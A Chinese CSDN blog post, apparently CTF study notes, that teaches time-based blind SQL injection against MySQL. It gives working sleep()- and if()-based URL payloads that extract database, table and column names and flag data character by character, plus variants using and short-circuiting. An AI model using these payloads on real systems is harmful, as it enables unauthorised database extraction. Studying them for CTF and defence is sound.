【基于时间的盲注】

于 2024-09-27 22:58:23 发布
阅读量92 收藏 2
点赞数 3
分类专栏: CTF 文章标签: 数据库 服务器 运维 linux php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45131319/article/details/142602769
版权

一、sql基础

sleep

请添加图片描述

benchmark

请添加图片描述

二、延时盲注

简介

请添加图片描述

练习

payload

猜库名长度
id=1 and if((length(database())=3),sleep(5),0)%23

我们发现这个payload和我们之前的布尔盲注非常像,就在返回结果那加了延时,如果我们猜的长度正确的话,那么我们直接开始练习:

猜测注入点

这次的注入点我们通过之前的四种方式返回的结果都一样:

id=1      显示hello
id=1'      显示hello
id=1'%23    显示hello
id=1 %23   显示hello

那么我们就需要另一种方式测试注入点是字符型还是数字型:

id=1 and sleep(5)%23  有延时
id=1' and sleep(5)%23  没有延时

测试出没有引号的有延时那么就是数字型:
请添加图片描述
开始猜长度,我们猜1,服务器直接返回了数据,说明长度不对,我们改成3试试:
请添加图片描述
发现有一段空白的等待时间,过了一会才返回的数据,说明猜对了,长度就是3:
请添加图片描述

猜库名的payload也是和布尔盲注类似,只是多了一个延时函数,下面我就不延时,直接放payload:

猜库名长度
id=1 and if((length(database())=3),sleep(5),0)%23
猜库名
id=1 and if((ascii(substr((select database()),1,1))=118),sleep(5),0)%23

猜表名长度
id=1 and if((select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=8,sleep(5),0)%23
猜表名
id=1 and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=118),sleep(5),0)%23

猜列名长度
id=1 and if((select length(group_concat(column_name)) from information_schema.columns where table_name='flag')=7,sleep(5),0)%23
猜列名
id=1 and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))=118),sleep(5),0)%23

猜数据长度
id=1 and if(((select length(flag) from flag)=38),sleep(5),0)%23
猜数据
id=1 and if((ascii(substr((select flag from flag),1,1))=102),sleep(5),0)%23

and断路特性

请添加图片描述

and断路特性
select 1<2 and sleep(5);
select 1>2 and sleep(5);

猜库名长度
id=1 and length(database())=3 and sleep(5)%23
猜库名
id=1 and ascii(substr((select database()),1,1))=119 and sleep(5)%23

猜表名长度
id=1 and (select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=9 and sleep(5)%23
猜表名
id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=102 and sleep(5)%23

猜列名长度
id=1 and (select length(group_concat(column_name)) from information_schema.columns where table_name='flag')=4 and sleep(5)%23
猜列名
id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))=102 and sleep(5)%23


猜数据长度
id=1 and (select length(flag) from flag)=38 and sleep(5)%23
id=1 and ascii(substr((select flag from flag),1,1))=102 and sleep(5)%23

sleep函数本身的作用就是产生延时,而benchmark函数是需要执行多次表达式产生延时

可以通过if函数进行条件判断,然后选择执行那条语句

当if被过滤时可以利用and的断路特性,使用多个and构造payload

盖头盖
关注
专栏目录
mysql基于时间盲注_基于时间型SQL盲注
weixin_39581739的博客
02-08 234
1 基于时间型SQL盲注注入SQL 代码之后, 存在以下两种情况:如果注入的SQL代码不影响后台[ 数据库] 的正常功能执行, 那么Web 应用的页面显示正确( 原始页面) 。如果注入的SQL 代码影响后台数据库的正常功能( 产生了SQL 注入) , 但是此时Web 应用的页面依旧显示正常( 原因是Web 应用程序采取了“ 重定向" 或“ 屏蔽 ”措施)。产生一个疑问: 注入的SQL 代码到底被后...
mysql基于时间盲注_MYSQL基于时间盲注详解
weixin_30864831的博客
02-08 1189
MYSQL基于时间盲注联合查询,报错注入,以及布尔盲注,都是基于攻击网站会回显消息,或者将错误信息返回在前端,或者会返回web页面的正确或错误但是有时候网站关闭了错误回显或过滤了某些关键字,网页会返回一种状态(status,只要进行了http传输,那么就会有一个状态值),这时候就要用到时间盲注时间盲注的基本函数if(1,2,3):如果1为True,则执行2,否则执行3sleep(x):延迟x秒之...
基于时间盲注
weixin_41489908的博客
09-29 563
遗憾的是,两个人不能在一起,却偏偏相遇。。。 ---- 网易云热评 一、函数介绍 1、sleep(5):暂停5秒再返回结果 2、if(条件,表达式1,表达式2):如果条件为真,返回表达式1,否则返回表达式2 3、substr('admin',2,3):从第二个位置开始截取长度为3的字符串,即dmi 4、substring('admin',2,3):效果和上面一样 5、substring('admin' from 2 for 1):截取一个字母,省略了逗号 6、substring('admi.
基于时间盲注的python脚本
weixin_43460822的博客
10-07 2288
思路:重要的是构建payload,然后循环进行测试,通过对请求的时间进行判断payload是否正确,从而确定数据库的长度和数据库的名称. #encoding=utf-8 #时间盲注脚本 import requests import time import datetime #获取数据库长度 def database_len(): #存放跑出的结果 length=0 ...
基于时间盲注的SQL注入
weixin_52467668的博客
12-29 366
Information_schema,信息数据库,其中保存有关于MySQL服务器所维护的所有其他数据库的信息,比如数据库名,数据库表,表字段的数据类型,访问权限等。SCHEMATA表:提供当前MySql实例中所有的数据库信息。mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。
CTF从入门到提升(四)基于时间盲注例题及解法_ctf时间盲注流量提取(1)
2401_84302369的博客
05-16 313
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
SQL注入---基于时间盲注
Ethan024的博客
03-31 470
SQL注入—基于时间盲注 实验平台: 皮卡丘靶场—盲注(base on time) 实验原理: 输入单引号’,确定此处没有报错信息: 输入payload:kobe’ and 1=1#,发现也没有报错信息 在浏览器后台—网络中查看payload执行时间:kobe’ and sleep(5)# 此处执行了sleep(5),执行时间用了5000ms。因此此处存在SQL注入,并且是基于时间盲注。 基于时间的延迟的payload:kobe’ and if((substr(database(),
mysql基于时间盲注_mysql基于“时间”的盲注
weixin_42494742的博客
01-19 113
mysql基于时间盲注======================================================================================================================================================================*猜解库名-下面是猜解正确mysql>...
基于时间盲注
Z_l123的博客
02-18 1274
关于时间(延时)盲注 某些场合下,页面只有一种返回结果,使用具有延时功能的函数sleep()、benchmark()等,通过判断这些函数是否正常执行来获取数据库中的数据。 一些功能函数的说明 length(str):返回字符串(str)的长度,以字节为单位。 substr(str,pos,len):从指定的位置(pos)开始,截取并返回字符串(str)指定长度(len)的子串。 ascii(str):返回字符串(str)最左边字符的ASCll码。 if(expr1,expr2,expr3):条件判断函
mysql基于时间盲注_mysql order by基于时间盲注
weixin_29164185的博客
02-08 117
order by后面的注入,一般先尝试报错注入,无报错的时候可以通过rand(ture)和rand(false)来进行bool型盲注,但是今天遇到完全没有数据回显的(也就是数据库中没有数据)情况,这就比较麻烦了。记录一下sql语句参考文章:https://www.cnblogs.com/babers/p/7397525.htmlhttps://www.cnblogs.com/Vinson404/p...
mysql基于时间盲注_MySQL基于时间盲注(Time-Based Blind SQL Injection)五种延时方法...
weixin_42527178的博客
01-19 962
PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注中延时方法的思考。延时函数SLEEPmysql> select sleep(5);+----------+| sleep(5) |+----------+| 0 |+----------+1 row in set (5.00 sec)BENCHMARKmysql> select benc...
CTF从入门到提升(四)基于时间盲注例题及解法
anquanniu的博客
08-21 1013
基于时间盲注,本次内容会涉及到写一些脚本。 ​​这里我先简单的示范,有两个网址推荐给大家, 看一下到底能不能影响到这个数据,这里用一个插件。 ​ 这个插件更新之前还挺好用的,更新之后就不太好用了。这里添加三个参数。 第一个,添加字段头用哪一个网址,这里添加了Headername,添加字段的名称X-Forwarded-For,然后到页面开启。 我们会发现它可以成功去修改它回写的内容,这个数据段...
基于时间盲注原理简介
m0_38103658的博客
08-30 6407
基于时间盲注 盲注简介 盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注盲注原理 盲注的本质就是猜解,在没有回显数据的情况下,我们只能靠‘感觉’来体会每次查询时一点点细微的差异,而这差异包括运行时间的差异和页面返回结果的差异。 对于基于布尔的盲注来说,我们可以构造一条注入语句来测试我们输入的布尔表...
简学-SQL注入(时间盲注
码农米格的博客
02-09 990
简学SQL注入0x06 SQL注入的主要类型(从漏洞类型的角度) 0x06 SQL注入的主要类型(从漏洞类型的角度) SQL注入主要分为以下几种类型: 1、Boolean-based blind SQL injection(布尔型注入) http://test.com/view?id=1 and substring(version,1,1)=5 如果服务端 Mysql 版本是5.X的话,那么页面返回的内容就会和正常的请求一样。 2、UNION query SQL injection(可联合查
计算机毕业设计之:基于微信小程序的诗词智能学习系统(源码+文档+解答)
程序员阿龙的博客
09-22 4401
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Online DDL (Data Definition Language)
09-23 255
是MySQL中的一个功能,允许在修改表结构(如添加、删除或修改列)的同时,允许对表进行并发读写操作。在传统的DDL操作中,对表结构的修改会导致整个表被锁定,从而阻止其他事务对该表进行读写操作,这可能导致长时间的锁定和性能问题。Online DDL的引入解决了这个问题,它允许在修改表结构的同时,保持对表的并发访问。MySQL从5.6版本开始引入了Online DDL的部分功能,而在8.0版本中对Online DDL进行了进一步的优化。
MySQL数据库的增删改查以及基本操作分享
m0_57094953的博客
09-21 462
MySQL数据库基本操作分享,包括增删改查,登录退出,查看数据库、表等
Java Alibaba Druid 数据库连接池
miracle的专栏
09-24 716
在Java开发中,数据库连接池是性能优化的重要一环。而作为一款强大的数据库连接池解决方案,凭借其和对多种数据库的支持,成为了许多企业级应用的首选。本篇文章将介绍Druid的核心特性,并结合不同数据库的实际用法。
JPA+Thymeleaf增删改查
最新发布
y050505的博客
09-25 424
在使用JPA(Java Persistence API)和Thymeleaf作为模板引擎进行Web开发时,实现增删改查(CRUD)操作是一个常见的需求。下面,我将简要介绍如何使用Spring Boot框架结合JPA和Thymeleaf来实现这一功能。
深入解析SQL盲注攻击技术
虽然例子主要基于微软的SQL Server和Oracle数据库,但这些技术同样适用于其他类型的数据库系统。 最后,论文强调,应用层面的安全漏洞必须通过应用级别的解决方案来处理,单纯依赖抑制错误消息来防止SQL注入是无效...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值